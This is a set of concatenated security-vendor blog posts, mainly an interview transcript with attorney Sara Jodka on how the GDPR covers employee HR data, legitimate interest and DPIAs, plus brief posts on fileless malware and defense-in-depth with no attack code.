If you’re curious about what it’s like to analyze complex attacks like this, get yourself a few cups of coffee and watch this video. It covers Kovter malware. Or take a peek at this blog post. Enjoy!

In the next post, we’ll finish up with regsvr32 and then look at other Windows Lol-ware that can perform similar feats of malware deception

 

Continue reading the next post in "Living off the Land With Microsoft"

[Transcript] Attorney Sara Jodka on the GDPR and HR Data

[Transcript] Attorney Sara Jodka on the GDPR and HR Data

In reviewing the transcript of my interview with Sara Jodka, I realize again how much great information she freely dispensed. Thanks Sara! The employee-employer relationship under the GDPR is a confusing area. It might be helpful to clarify a few points Sara made in our conversation about the legitimate interest exception to consent, and the threshold for Data Protection Impact Assessments (DPIAs).

The core problem is that to process personal data under the GDPR you need to have freely-given consent. If you can’t get that, you have a few other options, which are covered in the GDPR’s Article 6.  For employees, consent can not be given freely, and so employers will most likely need to rely on “legitimate interest” exception referred to in that article.

There’s a little bit of paperwork required to prove that the employer’s interest overrides the employee’s rights. In addition, employers will have to notify the employees as to what data is being processed. Sara refers to the ICO, the UK’s data protection authority, and they have an informal guidance, which is worth reading, on the legitimate interest process.

Since the data collected by the employer is also from a vulnerable subject (the employee) and contains a special class of sensitive personal data (health, payroll, union membership, etc.), it meets the threshold set by GDPR regulators — see this guidance — for performing a DPIA. As we know, DPIAs require companies to conduct a formal risk analysis of their data and document it.

Sara reminds us that some US companies, particularly service-oriented firms, may be surprised to learn about the additional work they’ll need to undertake in order to comply with the GDPR. In short: employees, like consumers, are under the new EU law.

 

Inside Out Security: Sara Jodka is an attorney with Dickenson Wright in Columbus, Ohio. Her practice covers data privacy and cyber security issues. Sara has guided businesses through compliance matters involving HIPPA, Gramm-Leach-Bliley, FERPA, and COPPA, and most importantly for this podcast, certification under the US-EU Privacy Shield, which, of course, falls under the General Data Protection Regulation or GDPR.

A lot of abbreviations there! Welcome, Sara.

Sara Jodka: Thank you for having me.

IOS: I wanted to get into an article that you had posted on your law firm’s blog. It points out an interesting subcategory of GDPR personal data which doesn’t get a lot of attention, and that is employee HR records. You know, of course it’s going to include ethnic, payroll, 401(k), and other information.

So can you tell us, at a high level, how the GDPR treats employee data held by companies?

Employee Data Covered By the GDPR

SJ: Whenever we look at GDPR, there are 99 articles, and they’re very broad. There’s not a lot of detail on the GDPR regulations themselves. In fact, we only have one that actually carves employment data out, and that’s Article 88  — there’s one in and of itself.

Whenever we’re looking at it, none of the articles say that all of these people have these rights. All these individuals have rights! None of them say, “Well, these don’t apply in an employment situation.” So we don’t have any exclusions!

We’re led to “Yes, they do apply.” And so we’ve been waiting on, and we have been working with guidances that we’re receiving, you know, from the ICO, with respect to ….  consent obligation, notice obligation, portability requirements, and  any employee context. Because it is going to be a different type of relationship than the consumer relationship!

IOS: It’s kind of interesting that people, I think, or businesses, probably are not aware of this … except those who are in the HR business.

So I think there’s an interesting group of US companies that would find themselves under these GDPR rules that probably would not have initially thought they were in this category because they don’t collect consumer data. I’m thinking of law firms, investment banking, engineering, professional companies.

US Professional Service Companies Beware!

SJ: I think that’s a very good point! In fact, that’s where a lot of my work is actually coming from. A lot of the GDPR compliance is coming from EU firms that specialize with EU privacy. But a lot of U.S. companies didn’t realize that this is going to cover their employment aspects that they had with EU employees that are in the EU!

They thought, “Well, because we don’t actually have a physical location EU, it doesn’t actually cover us.” That’s not actually at all true.
The GDPR covers people that are working in the EU, people who reside in the EU, so to the extent that U.S. company has employees that are working in the EU it is going to cover that type of employee data. And there’s no exception in the GDPR around it. So it’s going to include those employees.

IOS: So I hadn’t even thought about that. So their records would be covered under the GDPR?

SJ: Yeah, the one thing about the definition of a data subject under the GDPR is it doesn’t identify that it has to be an EU resident or it has to be an EU citizen. It’s just someone in the EU.

When you’re there, you have these certain rights that are guaranteed. And that will cover employees that are working for U.S. companies but they’re working in the EU.

IOS: Right.  And I’m thinking perhaps of a U.S. citizens who come there for some assignment, and maybe working out of the office, they would be covered under these rules.

SJ: And that’s definitely a possibility, and that’s one thing that we’ve been looking for. We’ve been looking for looking for guidance from the ICO to determine …  the scope of what this is going to look not only in an employment situation, but we’re dealing with an immigration situation, somebody on a work visa, and also in the context of schools as we are having, you know, different students coming over to the United States or going abroad. And what protection then the GDPR applies to those kind of in-transition relationships, those employees or students.

With a lot of my clients, we are trying to err on the side of caution and so do things ahead of time, rather than beg forgiveness if the authorities come knocking at our door.

GDPR’s Legitimate Interest Exception is Tricky

IOS: I agree that’s probably a better policy, and that’s something we recommend in dealing with any of these compliance standards.

In that article, you mentioned that the processing of HR records has additional protections under the GDPR …  An employee has to give explicit or consent freely and not as part of an employer-employee contract.

GDPR’s Article 6 says there are only six lawful ways to process data. If you don’t obtain freely given consent, then it gets tricky.

Can you explain this? And then, what does an employer have to do to process employee data  especially HR data?

SJ: Well, when we’re looking at the reasons that we’re allowed to process data, we can do it by consent, and we can also do it if we have a lawful basis.

A number of the lawful bases are going to apply in the employer context. One of those is if there is going to be an agreement. You know, in order to comply with the terms of a contract, like a collective bargaining agreement or like an employment agreement. So hire/fire payroll data would be covered under that, also if there is … a vital interest of an employee.

There’s speculation that that exception might actually be, or that legitimate basis might be used to obtain vital information regarding, like, emergency contact information of employees.

And there’s also one of the other lawful basis is if the employer has a greater, you know, interest in the data that doesn’t outweigh the right of the data subject, the employee.

The issue though is most … when we talk about is consumer data, and we’re looking a lot at consent and what actually consent looks like in terms of the express consent, you know, having them, you know, check the box or whatever.

In an employee situation, the [UK’s] ICO has come out with guidance with respect to this. And they have expressly said in an employee-employer relationship, there is an inherent imbalance of bargaining power, meaning an employee can never really consent to giving up their information because they have no bargaining power. They either turn it over, or they’re not employed. The employer is left to rely only on the other lawful basis to process data, excluding consent, so the contractor allowance and some of the others.

But the issue I have with that is, I don’t think that that’s going to cover all the data that we actually collect on an employee, especially employees who are operating outside the scope of a collective bargaining agreement.

In a context of, say, an at-will employee where there is that … where that contract exception doesn’t actually apply. I think there will be a lot of collection of data that doesn’t actually fall under that. It may fall into the legitimate interest, if the employer has the forethought to actually do what’s required, which is to actually document the process of weighing the employer’s interest against the interest of the employee, and making sure that that is a documented process. [ Read the UK’s ICO guidelines on the process of working out legitimate interest.]

When employers claim a legitimate interest exception to getting employee consent, they have more work to do. [Source: UK ICO]

But also what comes with that is the notice requirement, and the notice requirement is something that can be waived. So employers, if they are doing that, are going to have to  — and this is basically going to cover every single employer — they’re going to have to give their employees notice of the data that they are collecting on them, at a minimum.

IOS: At a minimum. I think to summarize what you’re saying is it’s just so tricky or difficult to get what they call freely given consent, that most employers will rely on legitimate interest.

Triggers for Data Protection Impact Assessments (DPIAs)

IOS: In the second part of this interview, we joined Sara Jodka as she explains what triggers a data protection impact assessment, or DPIA when processing employee data.

SJ: I think that’s required when we’re doing requirements for sensitive data, and we’re talking about sensitive HR data. A DPIA has be performed when two of the following exist, and there’s like nine things that have to be  there in order for a DPIA to have to be done. But you bring up a great point because the information that an employer is going to have is going to necessarily trigger the DPIA. [See these Working Party 29 guidelines for the nine criteria that Sara refers to.]

The DPIA isn’t triggered by us doing the legitimate basis …
and having to document that process. It’s actually triggered because we process sensitive data. You know, their trade union organization, affiliation, their religious data, their ethnicity. We have sensitive information, which is one of the nine things that can trigger, and all you need is two to require a DPIA.

Another one that employers always get is they process data of a vulnerable data subject. A vulnerable data subject includes employees.

IOS: Okay. Right.

SJ:  I can’t imagine a situation where an employer wouldn’t have to do a DPIA. The DPIA is different than the legitimate interest outweighing [employee rights] documentation that has to be done. They’re two different things.

 

IOS: So, they will have to do the DPIAs? And what would that involve?

SJ: Well, it’s one thing that’s required for high-risk data processing and that, as we just discussed, includes the data that employer has.

Essentially what a DPIA is, it’s a process that is designed to describe what processing the employer has, assess the necessity on proportionality to help manage the risk to the rights and the freedoms of the national persons resulting from the processing of personal data by assessing and determining the measures to address the data and the protections around it.

It’s a living document, so one thing to keep in mind about DPIA is they’re never done. They are going to be your corporation’s living document of the high-risk data you have and what’s happening with it to help you create tools for accountability and to comply with the GDPR requirements including, you know, notice to data subject, their rights, and then enforcing those rights.

It’s basically a tracking document … of the data, where the data’s going, where the data lives, and what happens with the data and then what happens when somebody asks for their data, wants to erase their data, etc.

GDPR Surprises for US Companies

IOS: Obviously, these are very tricky things and you definitely need an attorney to help you with it. So, can you comment on any other surprises U.S. companies might be facing with GDPR?

SJ: I think one of the most interesting points, whenever I was doing my research, to really drill down, from my knowledge level, is you’re allowed to process data so long as it’s compliant with a law. You know, there’s a legal necessity to do it.

And a lot of employers, U.S employers specifically, look at this and thought, “Great, that legal requirement takes the load off of me because I need, you know, payroll records to comply with the Fair Labor Standards Act and, you know, state wage laws. I need my immigration information to comply with the immigration control format.”

You know, they were like, “We have all these U.S. laws of why we have to retain .information and why we have to collect it.” Those laws don’t count, and I think that’s a big shock when I say, well, those laws don’t count.

We can’t rely on U.S. laws to process EU data!

We can only rely on EU laws and that’s one thing that’s brought up and kind of coincides with Article 88, which I think is an interesting thing.

If you look at Article 88 when they’re talking about employee data, what Article 88 does is it actually allows member states to provide for more specific rules to ensure that the protections and the freedoms of their data are protected.

These member states may be adding on more laws and more rights than the GDPR already complies! Another thing is, not only do we have to comply with an EU law, but we also are going to comply with member states, other specific laws that may be more narrow than the GDPR.

Employers can’t just look at the GDPR, they’re going to also have to look at if they know where a specific person is. Whether it’s Germany or Poland. They’re going to have to look and see what aspects of the GDPR are there and then what additional, more specific laws that member state may have also put into effect.

Interviewer: Right!

SJ: So, I think that there are two big legal issues hanging out there that U.S. multinational companies…

IOS: One thing that comes to my mind is that there are fines involved when not complying to this. And that includes, of course, doing these DPIAs.

SJ: The fines are significant. I think that’s the easiest way to put it is that the fines are, they’re astronomical, I mean, they’re not fines that we’re used to seeing so there’s two levels of fines depending on the violation. And they can be up to a company’s 4% of their annual global turnover. Or 20 million Euros.  If you’d look at it in U.S. dollar terms, you’re looking at, like, $23 million at this point.

For some companies that could be, that’s a game changer, that’s a company shut down. Some companies can withstand that, but some can’t. And I think any time you’re facing a $23 million penalty, the cost of compliance is probably going to weigh out the potential penalty.

Especially because these aren’t necessarily one-time penalties and there’s nothing that’s going to stop the Data Protection Authority from coming back on you and reviewing again and assessing another penalty if you aren’t in compliance and you’ve already been fined once.
I think the issue is going to be how far the reach is going to be for U.S. companies. I think for U.S. companies that have, you know, brick and mortar operations in a specific member state, I think enforcement is going to  be a lot easier for the DPA.

There’s going be a greater disadvantage to, actually, enforcement for, you know, U.S. companies that only operate in U.S. soil.

Now, if they have employees that are located in the EU, I think that enforcement is going to be a little bit easier, but if they don’t and they’re merely just, you know, attracting business via their website or whatever to EU, I think enforcement is gonna be a little bit more difficult, so it’s going to be interesting to see how enforcement actually plays out.

IOS: Yeah, I think you’re referring to the territorial scope aspects of the GDPR. Which, yeah, I agree that’s kind of interesting.

SJ: I guess my parting advice is this isn’t something that’s easy, it’s something that you do need to speak to an attorney. If you think that it may cover you at all, it’s at least worth a conversation. And I’ve had a lot of those conversations that have lasted, you know, a half an hour, and we’ve been very easily able to determine that GDPR is not going to cover the U.S. entity.

And we don’t have to worry about it. And some we’ve been able to identify that the GDPR is going to touch very slightly and we’re taking eight steps, you know, with the website and, you know, with, you know, on site hard copy documents to make sure that proper consent and notice is given in those documents.

So, sometimes it’s not going be the earth-shattering compliance overhaul of a corporation that you think the GDPR may entail, but it’s worth a call with a GDPR attorney to at least find out so that you can at least sleep better at night because this is a significant regulation, it’s a significant piece of law, and it is going to touch a lot of U.S. operations.

IOS: Right. Well, I want to thank you for talking about this somewhat under-looked area of the GDPR.

SJ: Thank you for having me.

Adventures in Fileless Malware: Closing Thoughts

Adventures in Fileless Malware: Closing Thoughts

I think we can all agree that hackers have a lot of tricks and techniques to sneakily enter your IT infrastructure and remain undetected while they steal the digital goodies. The key takeaway from this series is that signature-based detection of malware is easily nullified by even low-tech approaches, some of which I presented.

I’m very aware that prominent security researchers are now calling virus scanners useless, but don’t throw them out just yet! There’s still a lot of mint-condition legacy malware on the Intertoobz used by lazy hackers that would be blocked by these scanners.

A better philosophy in dealing with file-less malware and stealthy post-exploitation techniques is to supplement standard perimeter defenses, port scanners, and malware detectors with secondary lines of defense, and have strategies in place when the inevitable happens — including a breach response program.

I’m referring to, wait for it, defense-in-depth (DiD). This is a very practical approach to dealing with smart hackers who sneer at perimeter defenses, and mock signature scanning software.

Does DiD have its own problems? Sure. Those same security pros who have lost faith in traditional security measures are now promoting whitelisting of applications, which can be a very strong inner wall to protect against an initial breach.

But the code-free techniques I showed in this series can be used to even get around whitelisting. This falls under a new hacking trend called “living off the land”, which subverts legitimate tools and software for evil purposes. In the next few weeks, I’ll post a mini-tutorial on lol-ware. For those who want to do their homework ahead of time, start perusing this interesting github resource. Stay tuned.

Q: Can you get around Windows security protections by sneaking forbidden commands into regsvr32.exe? A: Yes, next question.

Get Real About Data Security!

In my view, defense-in-depth is about minimizing liabilities: taking what could be a potential catastrophe and transforming it into something that’s not too terrible or costs too much.

The hacker got in, but because of your company’s excellent and restrictive permission policies, you prevented her from gaining access to sensitive data.

Or the hackers have obtained access to the sensitive data, but your awesome user-behavior analytics technology has spotted the intruders and disabled the accounts before a million credit cards could be exfiltrated.

Or perhaps the hacker has managed to find and exfiltrate a file of email addresses. However, your outstanding breach response program, which includes having near real-time information on abnormal file activities, enables you to contact the appropriate regulators (and customers affected) in near record time with detailed information on the incident, thereby letting you avoid fines and bad publicity.

Common Sense Defense Advice

Defense-in-depth is more of a mind-set and philosophy, but there are, some practical steps to take and, ahem, great solutions available to make it easier to implement.

If I had to take the defense-in-depth approach and turn it into three actionable bullet points, here’s what I would say:

  • Assess. Evaluate your data risks by taking an inventory of what you need to protect. Identify PII and other sensitive data, some of which can be under regulations, and is often scattered across huge file system. You need to work out who has access to it and who really should have access to it. Warning: this ain’t easy to do, unless you have some help.
  • Defend. Now that you’ve found the data, limit the potential damage of future breaches by locking it down: reduce broad and global access, and simplify permission structures – avoid one-off ACLs and use group objects. Minimize the overall potential risk by retiring stale data or other data that no longer serves its original function.
  • Sustain. Maintain a secure state by automating authorization workflows, entitlement reviews, and the retention and disposition of data. And finally, monitor for unusual user and system behaviors.

Need to make your defense in depth dream a reality? Learn how we can help.

[Podcast] Attorney Sara Jodka on the GDPR and HR Data, Part II

[Podcast] Attorney Sara Jodka on the GDPR and HR Data, Part II

 

Leave a review for our podcast & we'll send you a pack of infosec cards.


In the second part of my interview with Dickinson Wright’s Sara Jodka, we go deeper into some of the consequences of internal employee data. Under the GDPR, companies will likely have to take an additional step before they can process this data: employers will have to perform a Data Protection Impact Assessment (DPIA).

As Sara explained in the first podcast, internal employee data is covered by the GDPR — all of the new law’s requirements still apply. This means conducting a DPIA when dealing with certain classes of data, which as we’ll learn in the podcast, includes HR data. DPIAs involve analyzing the data that’s being processed, assessing the risks involved, and putting in place the security measures to protect the data.

Last April, the EU regulators released a guidance on the DPIA, covering more of the details of what triggers this extra work. Legal wonks can review and learn about the nine criterion related to launching a DPIA.  Because HR data processing touches on two of the triggers — vulnerable subjects (employees) and sensitive data (HR) — it crosses the threshold set by the regulators.

Listen to Sara explain it all, and if you’re still not satisfied, have your in-house counsel review the regulator’s legalese contained in the EU guidance.

Continue reading the next post in "[Podcast] Attorney Sarah Jodka on the GDPR and HR Data"

[Podcast] Attorney Sara Jodka on the GDPR and Employee HR Data, Part I

[Podcast] Attorney Sara Jodka on the GDPR and Employee HR Data, Part I

 

Leave a review for our podcast & we'll send you a pack of infosec cards.


In this first part of my interview with Dickinson Wright attorney Sara Jodka, we start a discussion of how the EU General Data Protection Regulation (GDPR) treats employee data. Surprisingly, this turns out to be a tricky area of the new law. I can sum up my talk with her, which is based heavily on Jodka’s very readable legal article on this overlooked topic, as follows: darnit, employees are people too!

It may come as a surprise to some that the GDPR protects all “natural persons” in the EU. Employees, even non-citizen EU employees, are all completely natural, organic people under the GDPR. Their name, address, payroll, personal contacts, and in particular, sensitive ethnic or health data fall under the GDPR. So IT security groups will need to have all the standard GDPR security policies and procedures in place for employee data files — for example, minimize access to authorized users, set retention limits, and detect breaches.

The tricky part comes in getting “freely given” consent from employees. Listen to the podcast to learn how most EU employers will need to claim “legitimate interest” as away to process employee data without explicit consent. This will lead to some additional administrative overhead for employers, who will have to prove their interests override the employees’ privacy and notify employees of what’s being done to the data.

As we’ll learn in the second part of the podcast, because employee data often contains sensitive data as well, employers will also have to conduct a Data Protection Impact Assessment (DPIA), which will require even more work.

Bottom line: US service-based companies in the EU — financial, legal, professional services — who thought they escaped from the GDPR’s reach because they didn’t collect consumer data are very much mistaken.

Sara explains it all.

Continue reading the next post in "[Podcast] Attorney Sarah Jodka on the GDPR and HR Data"